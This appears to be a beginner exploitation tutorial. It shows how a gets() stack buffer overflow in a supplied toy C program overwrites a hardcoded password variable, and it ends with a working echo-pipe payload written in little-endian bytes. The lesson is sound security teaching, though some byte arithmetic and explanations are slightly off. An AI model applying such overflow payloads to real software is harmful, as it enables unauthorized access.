Overwriting Variables

Let's start easy

3KB

overwrite.zip

archive

Open

In this topic we will be overwriting variables in a program where the value is hardcoded. Let's check out how it runs first

❯ ./overwrite

What is the password?

Enter any value

❯ ./overwrite

What is the password?
idk
Output: Wrong!
12345%

It seems the program is asking for a password and outputs a value (ignore the % symbol)

Let's take a look at this snippet of the source code

void auth(){

	int pass = 0x12345;
	char buffer[32];

	printf("What is the password?\n");
	fflush(stdout);
	gets(buffer);


	if (pass == 0xdead10cc){
		printf("Output: That is correct!\n");
		printf("%x", pass);
	} else {
		printf("Output: Wrong!\n");
		printf("%x", pass);
	}
}

The pass variable is hardcoded to 0x12345 and if we enter any input it will just echo the current value of the pass. We can only get the password correct if the pass variable is equivalent to 0xdeadl0cc

So how do we do this?

Notice these lines:

char buffer[32];
...
...
gets(buffer);

The buffer is only set to hold 32 bytes of data and the use of gets which is a dangerous function that reads the buffer to an unknown amount can perform powerful attacks.

But what happens if we enter more than 32 bytes? (e.g. 33 bytes)

❯ ./overwrite

What is the password?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Output: Wrong!
10041%

We can see that it is overflowing and the value of A which is 0x41 in hex is partially filling up the variable.

You can ignore the 10041. Its just an indicator of the 4-byte combined value of 0x41, 0x23, 0x01 and 0x00

Before overflow:

[45] [23] [01] [00]

After overflow:

[41] [23] [01] [00]

Anyways try longer inputs

❯ ./overwrite

What is the password?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Output: Wrong!
41414141% 

We have completely overwrite the variable with A's.

We can leverage this vulnerability to overwrite the variable pass with 0xdead10cc so we can bypass the checks.

Let's try entering 32 A's and entering 0xdead10cc

❯ ./overwrite

What is the password?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdead10cc
Output: Wrong!
65647830%

It didn't work as we wanted because the way 32-bit programs read is in little-endian format which is in reverse

## Big-endian (MSB to LSB)
0xdead10cc

## Little-endian (LSB to MSB)
\xcc\x10\xad\xde

Final Exploit

Let's try our new input

❯ echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xcc\x10\xad\xde" | ./overwrite 

What is the password?
Output: That is correct!
dead10cc%

*Note: Normal inputs fail because the program interprets \x as part of a string, not as raw bytes, which can cause a segmentation fault. By using echo and piping the input, we send the actual bytes (\xcc\x10\xad\xde) directly into the program, allowing the overwrite to work as intended.